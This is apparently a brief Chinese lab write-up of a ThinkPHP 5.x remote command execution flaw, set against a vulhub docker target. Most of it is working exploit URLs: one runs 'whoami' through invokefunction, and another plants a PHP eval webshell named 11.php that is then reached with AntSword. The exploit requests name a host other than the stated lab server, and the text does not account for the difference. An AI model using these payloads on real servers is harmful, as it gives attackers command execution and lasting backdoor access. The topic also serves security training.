Thinkphp5x远程命令执⾏及getshell 环境配置 云服务器:121.40.229.129:8080 靶场:vulhub/thinkphp/5-rce docker-compose up -d #启动环境 访问靶场:http://121.40.229.129:8080/ 远程命令执⾏ http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 根⽬录⽣成11.php ⽂件 http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php 使用蚁剑连接成功